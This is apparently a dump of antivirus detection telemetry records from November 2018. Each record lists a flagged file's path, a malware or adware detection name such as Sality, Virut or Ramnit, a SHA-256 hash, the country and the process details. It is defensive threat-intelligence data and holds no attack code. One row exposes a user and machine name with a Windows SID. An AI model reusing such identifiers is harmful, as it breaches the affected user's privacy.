  Row(detection=Row(filename='set_homepage.exe.vir', filepath='\\\\?\\C:\\Windows\\System32\\oobe\\OEM\\Set_Homepage.exe.VIR', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='493fb9580aac7ec665b8c3ba103c757a206508bb855a74ae0ae8a3eea326df4e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:49:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-133049-6dbaa667', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10768840\\AVSCAN-20181102-132954-66BA481E\\AVSCAN-20181102-133049-6DBAA667', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:30:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mini_installer[1].exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\VGWGML3Z\\mini_installer[1].exe', filesize=48512000, name='W32/Virut.Gen.#M1.#R1'), hash='f2efdd2f1be00bae7310b3d39eab985b4bb3db7a42911dae7a6feaf24644e943', metadata=Row(cmdline='\\\\\\/DB', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-02T12:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150600-5c5fa3ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1d620a3\\AVSCAN-20181102-150530-575D3AEB\\AVSCAN-20181102-150600-5C5FA3AD', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='7c7aa9e91dc1b448e160f653614a0add4a55ba56c983422f986851e7c840dd4f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libeay32.dll', filepath='f:\\crazykart\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:26:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='choji.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Choji\\Choji.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='cbec637c40b79c4c9af7f07feb0d751ef348ad8bb673edc0ca75ece4cdd24bc0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\360\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cUsVGYelgkW+dOtC.2', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T17:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Pixologic ZBrush 4R8 P2 + Crack (x64) - [CrackzSoft]\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-02T21:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095229-b1af7cf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e952447a\\AVSCAN-20181102-095105-A0FCBA31\\AVSCAN-20181102-095229-B1AF7CF7', filesize=44864000, name='TR/AVKiller.twazw.#M1.#R1'), hash='b36c48f3568b5b6b37bde33c5c911e82b52c8d5f47e9b41b1203185711ae112e', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deidara.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Deidara\\Deidara.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='bc4ed85e4fafef69e6bcd380f2fc35db78588df2713be741d831269121ae82d4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141436-6a50781d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141436-6A50781D', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rufus 2.11.exe', filepath='\\\\?\\D:\\Softwares\\NERO IMAGES\\Rufus USB-tool\\Rufus 2.11.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='f52b3a488245a9de756aa486ef773a17096cb2ad2db82af9c596a0c71dff3f94', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:08:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='holford.exe', filepath='\\\\?\\C:\\Windows\\holford.exe', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='cb870b0ae24752c349ed24ea18b2e1e6d01df7e11dbbf51225a6eb9827fe7f55', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:57:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T14:56:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='Adware/OSX.GT3Geeks.pewvs.#M1.#R1'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{E525F0F6-A2F5-4298-8E20-D97F4B7FB9B9} S-1-5-21-3651596969-1277983412-1928224779-1000:mfathy-PC\\\\mfathy:Interactive:[1]', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T12:11:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000fe0d7', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000fe0d7', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fact-pcgo-9808-2622.doc', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Outlook\\9SBPJ6VB\\FACT-PCGO-9808-2622.doc', filesize=80000, name='W97M/Agent.05081722.#M1.#R1'), hash='e59d0aee5b96f29c5840de42c1197cd1821e95ffdb43d092fecba31c514c103f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:06:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fa2e114eb7adfcc488d1e7d47521756c175d24851d5b97ca0529b435be44e6c7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\FA2E114EB7ADFCC488D1E7D47521756C175D24851D5B97CA0529B435BE44E6C7', filesize=2048000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='fa2e114eb7adfcc488d1e7d47521756c175d24851d5b97ca0529b435be44e6c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:06:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160948-5e0d7764', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16c56836\\AVSCAN-20181102-154554-D8738C57\\AVSCAN-20181102-160948-5E0D7764', filesize=96000, name='PUA/FindWide.#M1.#R1'), hash='e6e84c26e6e540487262c987a40d0b375bc27032a101445842e8441bad6703cb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:09:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151306-d2f47cc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7bee32b\\AVSCAN-20181102-144720-79235D27\\AVSCAN-20181102-151306-D2F47CC9', filesize=3080000, name='PUA/SearchProtect.#M1.#R1'), hash='c7e2762651f4dd99326baa1499761d1e1fcd48f6adb8ca9096590e6cab8e1ae5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T12:51:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-223609-bd6b6e60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_393a1b08\\AVSCAN-20181102-221842-00FC9DC9\\AVSCAN-20181102-223609-BD6B6E60', filesize=316000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='c7f8a645ffb6e3ae4ecc262168d56de27cd9b68f63de7eab74a103ac3a2df6d7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:36:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='obs60.dll', filepath='C:\\orant\\BIN\\OBS60.DLL', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='ec4a0ca3b33b31d87283e27ca2af0fb0072715267396b5afa2d7163bde91df24', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:43:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082200-6ed1ed96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082136-6BD8F9E6\\AVSCAN-20181102-082200-6ED1ED96', filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='de0ab28d7b7791411cc803c89a570bf093b7810e6943c30f0366e5ab0a30ffab', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\DE0AB28D7B7791411CC803C89A570BF093B7810E6943C30F0366E5AB0A30FFAB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='de0ab28d7b7791411cc803c89a570bf093b7810e6943c30f0366e5ab0a30ffab', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:10:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:55:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\ANCIENPC\\C\\Program Files\\File Recovery\\undelete360\\unins000.exe', filesize=784000, name='W32/Sality.AT.#M1.#R1'), hash='d5ee8229a137c303b23ba143a490bb48d12f62f7f5b01c6ef269555c75f5e2c6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:DOKd3VcrO0Sn1oz+.1', country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:48:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/flags:0x0', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=38400, timestamp='2018-11-02T21:18:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b3c28e204f8a886514901c9f772b70da8fa0ac2a8697483fe28b5082b3d54abc.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B3C28E204F8A886514901C9F772B70DA8FA0AC2A8697483FE28B5082B3D54ABC.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b3c28e204f8a886514901c9f772b70da8fa0ac2a8697483fe28b5082b3d54abc', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:49:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7z922-downloader.exe', filepath='\\\\SRV-Daten\\Daten\\_Systemhaus\\rhuf\\Eigene Dateien\\Programme\\7z922-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='90cda131317b2ce9a36c1a648ca3d290a706374e27f24ee44cd721efef59561a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Microsoft Office\\Office14\\OUTLOOK.EXE', parentsize=15789144, timestamp='2018-11-02T08:28:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pes2017.exe', filepath='K:\\العاب\\كورة اصلى 3\\Pro Evolution Soccer 2017\\PES2017.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='ada3141bc4a7f2330f73878714c7985491449e05bc9420b08b05a0ea3d637855', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T13:00:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fbb824cb0f5a9380fe6745c68208e1913ab275012b94e75ed9cf4b7c1aed8b1e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FBB824CB0F5A9380FE6745C68208E1913AB275012B94E75ED9CF4B7C1AED8B1E', filesize=768000, name='PUA/SoftPulse.aonb.#M1.#R1'), hash='fbb824cb0f5a9380fe6745c68208e1913ab275012b94e75ed9cf4b7c1aed8b1e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:07:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290429', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290429', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:30:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182514-89a05a97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-182514-89A05A97', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:25:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f741f5311855fc6ed77ce20b8485176c0cc2ada909bc68997e8a2e4bd5cdae43', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F741F5311855FC6ED77CE20B8485176C0CC2ADA909BC68997E8A2E4BD5CDAE43', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f741f5311855fc6ed77ce20b8485176c0cc2ada909bc68997e8a2e4bd5cdae43', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:53:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290c59', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290c59', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:40:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-233355-93614bb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3284563\\AVSCAN-20181104-232222-3AD0C4A6\\AVSCAN-20181104-233355-93614BB2', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:34:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295a52', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295a52', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:07:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='db4a5b29d52096cc2cb145cdeb802389c5c91d31d49602f37914095d4a5b4237', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ac422967f227c1a312ce1b2f61eb45d976ba7e14c60568cb3844e029922b3804', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\AC422967F227C1A312CE1B2F61EB45D976BA7E14C60568CB3844E029922B3804', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='ac422967f227c1a312ce1b2f61eb45d976ba7e14c60568cb3844e029922b3804', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:34:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b49a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b49a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:14:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d28d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d28d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:47:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191451-bc806c5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_281e4681\\AVSCAN-20181104-191247-B5520187\\AVSCAN-20181104-191451-BC806C5C', filesize=604000, name='PUA/Outbrowse.Gen.#M300.#R6338'), hash='f23e365a312e08d20d71fda30a727d4d91ccb32f0ed56d55c745766d44f30013', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='D:\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f325037ca3c79c5dd0ada16881c59246e5044d1d1c165e93fd9c09b6d59a209c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:16:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:50Z'), dt=datetime.date(2018, 11, 4)),
